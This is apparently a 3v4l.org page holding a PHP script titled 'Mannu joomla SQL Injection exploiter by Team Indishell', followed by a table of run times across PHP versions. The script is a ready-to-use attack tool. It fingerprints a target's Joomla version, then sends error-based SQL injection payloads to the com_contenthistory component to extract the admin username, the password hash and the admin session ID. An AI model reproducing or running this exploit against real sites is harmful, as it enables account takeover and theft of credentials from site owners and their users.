3v4l.org

run code in 300+ PHP versions simultaneously
<?php error_reporting(0); set_time_limit(0); $head = ' <html> <head> <link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTLfLXmLeMSTt0jOXREfgvdp8IYWnE9_t49PpAiJNvwHTqnKkL4" rel="icon" type="image/x-icon"/> </script> <title>--==[[Mannu joomla SQL Injection exploiter by Team Indishell]]==--</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <STYLE> body { font-family: Tahoma; color: white; background: #444444; } input { border : solid 2px ; border-color : black; BACKGROUND-COLOR: #444444; font: 8pt Verdana; color: white; } submit { BORDER: buttonhighlight 2px outset; BACKGROUND-COLOR: Black; width: 30%; color: #FFF; } #t input[type=\'submit\']{ COLOR: White; border:none; BACKGROUND-COLOR: black; } #t input[type=\'submit\']:hover { BACKGROUND-COLOR: #ff9933; color: black; } tr { BORDER: dashed 1px #333; color: #FFF; } td { BORDER: dashed 0px ; } .table1 { BORDER: 0px Black; BACKGROUND-COLOR: Black; color: #FFF; } .td1 { BORDER: 0px; BORDER-COLOR: #333333; font: 7pt Verdana; color: Green; } .tr1 { BORDER: 0px; BORDER-COLOR: #333333; color: #FFF; } table { BORDER: dashed 2px #333; BORDER-COLOR: #333333; BACKGROUND-COLOR: #191919;; color: #FFF; } textarea { border : dashed 2px #333; BACKGROUND-COLOR: Black; font: Fixedsys bold; color: #999; } A:link { border: 1px; COLOR: red; TEXT-DECORATION: none } A:visited { COLOR: red; TEXT-DECORATION: none } A:hover { color: White; TEXT-DECORATION: none } A:active { color: white; TEXT-DECORATION: none } </STYLE> <script type="text/javascript"> <!-- function lhook(id) { var e = document.getElementById(id); if(e.style.display == \'block\') e.style.display = \'none\'; else e.style.display = \'block\'; } //--> </script> '; echo $head ; echo ' <table width="100%" cellspacing="0" cellpadding="0" class="tb1" > <td width="100%" align=center valign="top" rowspan="1"> <font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ Mannu, Joomla </font><font color=white size=5 face="comic sans ms"><b>SQL Injection exploiter By Team </font><font color=green size=5 face="comic sans ms"><b> INDIShEll]]==--</font> <div class="hedr"> <td height="10" align="left" class="td1"></td></tr><tr><td width="100%" align="center" valign="top" rowspan="1"><font color="red" face="comic sans ms"size="1"><b> <font color=#ff9933> ##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font><br><font color=white> -==[[Greetz to]]==--</font><br> <font color=#ff9933>Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indisHell,Baba ,Silent poison India,Magnum sniper,ethicalnoob IndisHell,Local root indisHell,Irfninja indisHell<br>Reborn India,L0rd Crus4d3r,cool toad,Hackuin,Alicks,Dinelson Amine,Th3 D3str0yer,SKSking,rad paul,Godzila,mike waals,zoo zoo,cyber warrior,Neo hacker ICA<br>cyber gladiator,7he Cre4t0r,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen ,lovetherisk and rest of TEAM INDISHELL<br> <font color=white>--==[[Love to]]==--</font><br># My Father , my Ex Teacher,cold fire HaCker,Mannu, ViKi,Suriya Cyber Tyson ,Ashu bhai ji,Soldier Of God,almas malik, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand,Govind singh,Budhaoo,Don(Deepika kaushik) and acche bacchi(Jagriti) <br> <font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>GCE College ke DON :D</font> <br></font> <b> <font color=#ff9933> ##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font> </table> </table> <br> '; ?> <div align=center> <form method=post> <input type=input name=in value=target> <input type=submit name=sm value="check version"> <?php function data($lu) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $lu); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8'); $result['EXE'] = curl_exec($ch); curl_close($ch); return $result['EXE']; } if(isset($_POST['sm'])) { $target=trim($_POST['in']); $finalurl=$target."/language/en-GB/en-GB.xml"; $data=file_get_contents($finalurl); $ar0=explode("<version>", $data); $ar1=explode("</version>", $ar0[1]); $ar=trim($ar1[0]); echo "<br>"; $v=explode(".",$ar); if($v[0]<=3) { //echo "<br><br> Joomla version is 3.*.*"; //echo "<br> yes yes >:D<, fas gaya billu "; echo "<br>click below button to exploit it :v <br><br>" ; echo "<form method=post><input type=hidden name=tar value=".$target.">"; echo "<input type=submit name=sm1 value=\"Chal billu, ghuma de soday ne xD\">"; } else{ echo "joomla version is below 3"; } } if(isset($_POST['sm1'])) { $tar=$_POST['tar']."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select+1+from+(select+count(*),+concat((select+(select+concat(password))+from+icalab_users+LIMIT+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)"; $dat=data($tar); $ar0=explode("LEFT JOIN", $dat); $ar1=explode("_users", $ar0[1]); $ar=trim($ar1[0]); $rt=str_replace("icalab",$ar,$tar); $tr=data($rt); $ar0=explode("Duplicate entry", $tr); $ar1=explode("for key", $ar0[1]); $rt2=str_replace("password","username,0x7e",$rt); $tr2=data($rt2); $ar2=explode("Duplicate entry", $tr2); $ar3=explode("for key", $ar2[1]); if($ar3[0]!='' && $ar1[0]!='') { echo "<br><br> Target gone 8-)<br><br>website name:- ".$_POST['tar']." <br>-------------------------------<br> <br>"; echo "username is --> ".str_replace("~1","",trim($ar3[0]))." <br>Password Hash is --> ".str_replace("~1","",trim($ar1[0])); echo "<br>Admin session ID is<br></div>"; $sessionid=$_POST['tar']."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select+1+from+(select+count(*),+concat((select+(select+concat(session_id))+from+".$ar."_session+where+username='admin'+LIMIT+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)"; $ses=data($sessionid); $ar0=explode("Duplicate entry", $ses); $ar1=explode("for key", $ar0[1]); echo trim($ar1[0]); } } ?> <!-- 3.2.* to 3.4.4 -->

Here you find the average performance (time & memory) of each version. A grayed out version indicates it didn't complete successfully (based on exit-code).

VersionSystem time (s)User time (s)Memory (MiB)
8.4.20.0080.00817.79
8.4.10.0110.00017.68
8.3.150.0120.00617.10
8.3.140.0160.00016.65
8.3.130.0090.00018.40
8.3.120.0000.01020.91
8.3.110.0090.00020.94
8.3.100.0060.00316.86
8.3.90.0000.00826.77
8.3.80.0060.00318.31
8.3.70.0070.01116.63
8.3.60.0140.00018.30
8.3.50.0300.00721.20
8.3.40.0090.00618.63
8.3.30.0110.00718.84
8.3.20.0040.00418.87
8.3.10.0100.00021.78
8.3.00.0000.00820.78
8.2.270.0110.00717.16
8.2.260.0090.00916.61
8.2.250.0040.00416.66
8.2.240.0090.00017.30
8.2.230.0040.00422.58
8.2.220.0090.00024.06
8.2.210.0050.00326.77
8.2.200.0030.00616.50
8.2.190.0110.00416.58
8.2.180.0070.01117.00
8.2.170.0110.00722.96
8.2.160.0040.01119.29
8.2.150.0050.00324.18
8.2.140.0030.00624.66
8.2.130.0040.00721.02
8.2.120.0040.00426.35
8.2.110.0100.00020.52
8.2.100.0110.00017.84
8.2.90.0050.00319.39
8.2.80.0040.00417.97
8.2.70.0000.00817.50
8.2.60.0000.00818.05
8.2.50.0060.00318.10
8.2.40.0040.00422.17
8.2.30.0000.00720.58
8.2.20.0050.00317.70
8.2.10.0040.00419.82
8.2.00.0040.00418.14
8.1.310.0000.00818.35
8.1.300.0030.00618.77
8.1.290.0080.00430.84
8.1.280.0080.00825.92
8.1.270.0040.00423.76
8.1.260.0040.00428.09
8.1.250.0040.00428.09
8.1.240.0060.00622.21
8.1.230.0040.00723.86
8.1.220.0040.00417.74
8.1.210.0040.00418.77
8.1.200.0040.00417.22
8.1.190.0050.00317.35
8.1.180.0040.00418.10
8.1.170.0090.00018.66
8.1.160.0080.00019.10
8.1.150.0050.00219.01
8.1.140.0040.00419.66
8.1.130.0000.00717.78
8.1.120.0040.00417.46
8.1.110.0030.00617.53
8.1.100.0030.00617.55
8.1.90.0000.00717.60
8.1.80.0050.00317.56
8.1.70.0060.00317.57
8.1.60.0000.01017.72
8.1.50.0040.00417.64
8.1.40.0040.00717.60
8.1.30.0040.00417.63
8.1.20.0050.00317.64
8.1.10.0070.00017.44
8.1.00.0000.00817.58
8.0.300.0000.00718.77
8.0.290.0000.00816.75
8.0.280.0000.00718.58
8.0.270.0030.00316.89
8.0.260.0050.00317.30
8.0.250.0030.00316.98
8.0.240.0030.00516.91
8.0.230.0070.00017.08
8.0.220.0080.00016.97
8.0.210.0030.00516.88
8.0.200.0000.00817.05
8.0.190.0070.00017.06
8.0.180.0000.00716.89
8.0.170.0030.00517.10
8.0.160.0000.00716.88
8.0.150.0070.00016.93
8.0.140.0040.00416.85
8.0.130.0000.00613.39
8.0.120.0000.00916.96
8.0.110.0000.00717.02
8.0.100.0040.00416.76
8.0.90.0050.00216.98
8.0.80.0130.00317.04
8.0.70.0000.00716.97
8.0.60.0040.00416.91
8.0.50.0070.00016.85
8.0.30.0060.01317.17
8.0.20.0110.01017.40
8.0.10.0040.00416.90
8.0.00.0120.00916.81
7.4.330.0000.00515.08
7.4.320.0000.00616.59
7.4.300.0000.00616.64
7.4.290.0030.00316.57
7.4.280.0070.00016.55
7.4.270.0070.00016.63
7.4.260.0030.00316.59
7.4.250.0000.00716.47
7.4.240.0040.00416.60
7.4.230.0030.00316.79
7.4.220.0140.01016.65
7.4.210.0100.00816.66
7.4.200.0000.00816.48
7.4.150.0180.00317.40
7.4.140.0110.01117.86
7.4.130.0090.01316.59
7.4.120.0030.01416.50
7.4.110.0080.00816.83
7.4.100.0100.01416.61
7.4.90.0110.00616.47
7.4.80.0060.01519.39
7.4.70.0130.00316.68
7.4.60.0080.00816.56
7.4.50.0060.01016.39
7.4.40.0060.01316.53
7.4.30.0050.01316.53
7.4.00.0050.00915.15
7.3.330.0000.00513.06
7.3.320.0030.00313.18
7.3.310.0000.00716.21
7.3.300.0020.00516.29
7.3.290.0070.00716.28
7.3.280.0050.01216.34
7.3.270.0100.01317.40
7.3.260.0090.00916.36
7.3.250.0150.00716.46
7.3.240.0130.00416.60
7.3.230.0030.01416.54
7.3.210.0090.00916.27
7.3.200.0170.00016.54
7.3.190.0080.00816.60
7.3.180.0130.00316.53
7.3.170.0120.00916.28
7.3.160.0060.01216.59
7.3.120.0140.00414.88
7.3.110.0130.00315.05
7.3.100.0080.00815.03
7.3.90.0100.00715.07
7.3.80.0060.01314.84
7.3.70.0100.00714.66
7.3.60.0040.00714.96
7.3.50.0060.00614.74
7.3.40.0060.00914.75
7.3.30.0140.00014.77
7.3.20.0040.01116.35
7.3.10.0040.00816.71
7.3.00.0030.01016.59
7.2.330.0110.00716.52
7.2.320.0100.00716.75
7.2.310.0150.00316.55
7.2.300.0080.00816.66
7.2.290.0100.00716.48
7.2.250.0100.00715.08
7.2.240.0100.01015.00
7.2.230.0070.01115.21
7.2.220.0060.00314.92
7.2.210.0070.01314.95
7.2.200.0070.01014.95
7.2.190.0030.01614.92
7.2.180.0030.01015.00
7.2.170.0040.00714.77
7.2.110.0150.00816.62
7.2.60.0000.01416.55
7.1.330.0120.00315.63
7.1.320.0100.00315.73
7.1.310.0070.00715.69
7.1.300.0030.00615.93
7.1.290.0000.01315.46
7.1.280.0030.01015.97
7.1.270.0040.01115.70
7.1.260.0040.00415.59
7.1.200.0070.00415.93
7.1.70.0030.00917.07
7.1.60.0060.01920.41
7.1.50.0070.01416.82
7.1.00.0100.07022.44
7.0.200.0200.00714.79
7.0.60.0300.07321.63
7.0.50.0100.03718.03
7.0.40.0270.07020.23
7.0.30.0130.06320.14
7.0.20.0130.06320.22
7.0.10.0200.06020.35
7.0.00.0170.06020.30
5.6.280.0030.07320.81
5.6.210.0030.06720.53
5.6.200.0170.07018.23
5.6.190.0330.06720.67
5.6.180.0300.05020.60
5.6.170.0130.06320.68
5.6.160.0230.05020.55
5.6.150.0100.07020.59
5.6.140.0200.05320.35
5.6.130.0330.07020.45
5.6.120.0000.07020.32
5.6.110.0270.05320.34
5.6.100.0300.05720.40
5.6.90.0230.05320.30
5.6.80.0030.06719.93
5.6.70.0170.07719.79
5.6.60.0200.07019.75
5.6.50.0130.08719.83
5.6.40.0270.04719.75
5.6.30.0300.04719.81
5.6.20.0230.05019.79
5.6.10.0130.06019.71
5.6.00.0230.05719.79
5.5.350.0170.07720.44
5.5.340.0100.07718.07
5.5.330.0400.07020.41
5.5.320.0270.05020.26
5.5.310.0130.06320.25
5.5.300.0070.06720.17
5.5.290.0300.05720.20
5.5.280.0200.07020.41
5.5.270.0430.05320.21
5.5.260.0200.05320.20
5.5.250.0230.08320.20
5.5.240.0030.07319.61
5.5.230.0170.07719.57
5.5.220.0270.06019.48
5.5.210.0100.09319.40
5.5.200.0230.05319.57
5.5.190.0130.06019.59
5.5.180.0230.05019.55
5.5.160.0170.05719.56
5.5.150.0000.07719.59
5.5.140.0300.04719.74
5.5.130.0170.06019.57
5.5.120.0200.06019.45
5.5.110.0070.07019.55
5.5.100.0100.06719.39
5.5.90.0130.05719.41
5.5.80.0200.05019.32
5.5.70.0270.04319.48
5.5.60.0230.05019.48
5.5.50.0170.05319.42
5.5.40.0100.05719.46
5.5.30.0130.06019.37
5.5.20.0130.05719.54
5.5.10.0100.06019.46
5.5.00.0070.06319.40

preferences:
29.32 ms | 403 KiB | 5 Q